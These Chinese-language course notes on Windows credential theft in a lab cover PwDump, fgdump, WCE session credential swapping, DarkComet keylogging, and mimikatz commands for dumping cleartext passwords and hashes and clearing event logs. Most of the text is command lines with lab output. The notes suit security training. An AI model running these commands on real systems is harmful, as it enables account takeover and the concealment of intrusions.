本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程，教程為安全牛課堂裡的《Kali Linux 滲透測試》課程
1. 抓包嗅探
2. 鍵盤記錄本地密碼
3. 檢視本地快取密碼
4. WCE (WINDOWS CREDENTIAL EDITOR)
5. fgdump
6. mimikatz

1. 抓包嗅探

1. Windows

   • Wireshark
   • Omnipeek
   • Commview
   • Sniffpass：抓取密碼相關的資料包

2. Linux

   • Tcpdump
   • Wireshark
   • Dsniff：抓取密碼相關的資料包

2. 鍵盤記錄本地密碼

• 可以使用木馬軟體 DarkCometRAT

  在控制目標主機之後可以監控鍵盤記錄資訊

3. 檢視本地快取密碼

1. 在瀏覽器檢視快取密碼

   

2. 使用 Pwdump 檢視 windows 本地登入密碼

   • windows 登入密碼儲存在 C:\Windows\System32\config\SAM 檔案中
   • Pwdump 在 kali 系統中可以找到 /usr/share/windows-binaries/fgdump/

   • 新增使用者

     C:\Documents and Settings\kevin>net user user2 123456 /add
     C:\Documents and Settings\kevin>net user
         \\ICST-WINATT 的使用者帳戶
         -------------------------------------------------------------
         Administrator            Guest                    HelpAssistant
         kevin                    SUPPORT_388945a0         test
         user1                    user2
     C:\Documents and Settings\kevin>cd \
     C:\>PwDump.exe localhost
         Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
         Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
         HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
         kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
         SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
         test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
         user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
         user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::Completed.
     # 結果：前部分是 LMHASH ，後部分是 NTLMHASH
      
     

   • 可以將結果儲存在檔案中，然後在 kali 中進行破解

     

4. WCE (WINDOWS CREDENTIAL EDITOR)

1. WINDOWS身份認證過程

   

2. WCE (WINDOWS CREDENTIAL EDITOR)

   • windows 核心中儲存有密碼明文副本，安全機制較低
   • 需要管理員許可權
   • 工具保持在 kali 的 /usr/share/wce/wce-universal # 通用格式是自動識別32位和64位

   • 多使用者登入目標主機

     

   • 列舉登入賬號及會話

     C:\>wce-universal.exe -lv
         0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
         # 與 C:\>PwDump.exe localhost 結果相同
      
     

   • 每隔5秒重新整理一次

     C:>wce-universal.exe -r

   • 刪除登入會話

     C:\>wce-universal.exe -d 0020B19D
     C:\>wce-universal.exe -lv
         001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
     

   • 計算密碼對應的 HASH 值

     C:\>wce-universal.exe -g passwd
         Password:   passwd
         Hashes:     91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
     

   • 讀取核心中的明文密碼

     C:\>wce-universal.exe -w
         user1\ICST-WINATT:123456
         user2\ICST-WINATT:123456
         test\ICST-WINATT:123456
         kevin\ICST-WINATT:123456
         NETWORK SERVICE\MSHOME:
     
     C:\>net user user1 111222
         命令成功完成。
     C:\>wce-universal.exe -w
         user1\ICST-WINATT:123456
         user2\ICST-WINATT:123456
         test\ICST-WINATT:123456
         kevin\ICST-WINATT:123456
         NETWORK SERVICE\MSHOME:
     # 當前核心中儲存的值會在下次登入被讀取出來
     

   • 對 LUID 進行修改（將LUID改為匹配其他使用者的使用者名稱和密碼）

     C:\>wce-universal.exe -lv
         001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
     C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-    WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         Changing NTLM credentials of logon session 001E5D92h to:
         Username: kevin
         domain: ICST-WINATT
         LMHash: 44EFCE164AB921CAAAD3B435B51404EE
         NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
         NTLM credentials successfully changed!
     C:\>wce-universal.exe -lv
         001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
         000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
     

   • Win7 及 之前預設 都可遭受 WCE 攻擊

     防範方法：修改登錄檔

     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
     

     刪除 wdigest 之後重啟計算機

     

5. fgdump

1. PwDump localhost

   位置：Pwdump 在 kali 系統中可以找到 /usr/share/windows-binaries/fgdump/

2. fgdump

   位置：Pwdump 在 kali 系統中可以找到 /usr/share/windows-binaries/fgdump/
   放在 WinXP 中， 雙擊或在命令列執行 fgdump.exe 會自動生成三個檔案，檔案中儲存著密碼

   

6. mimikatz

• 在 kali 中的路徑 /usr/share/mimikatz，將 win32 複製到 windows 主機

  C:\Win32>mimikatz.exe
  檢視幫助是：：
  mimikatz # ::
              standard  -  Standard module  [Basic commands (does not require module name)]
                crypto  -  Crypto Module
              sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
              kerberos  -  Kerberos package module  []
             privilege  -  Privilege module
               process  -  Process module
               service  -  Service module
               lsadump  -  LsaDump module
                    ts  -  Terminal Server module
                 event  -  Event module
                  misc  -  Miscellaneous module
                 token  -  Token manipulation module
                 vault  -  Windows Vault/Credential module
           minesweeper  -  MineSweeper module
                   net  -
                 dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
             busylight  -  BusyLight Module
                sysenv  -  System Environment Value module
                   sid  -  Security Identifiers module
                   iis  -  IIS XML Config module
                   rpc  -  RPC control of mimikatz            
  mimikatz # privilege::
              Module :        privilege
              Full name :     Privilege module
  
                 debug  -  Ask debug privilege            * *
                driver  -  Ask load driver privilege
              security  -  Ask security privilege
                   tcb  -  Ask tcb privilege
                backup  -  Ask backup privilege
               restore  -  Ask restore privilege
                sysenv  -  Ask system environment privilege
                    id  -  Ask a privilege by its id
                  name  -  Ask a privilege by its name
  mimikatz # privilege::debug
  mimikatz # sekurlsa::
  mimikatz # sekurlsa::logonPasswords
  mimikatz # sekurlsa::wdigest
  mimikatz # process::list
  mimikatz # lsadump::sam
  mimikatz # lsadump::cache
  mimikatz # ts::multirdp
  mimikatz # event::clear
  mimikatz # event::drop
  mimikatz # misc::regedit
  mimikatz # token::whoami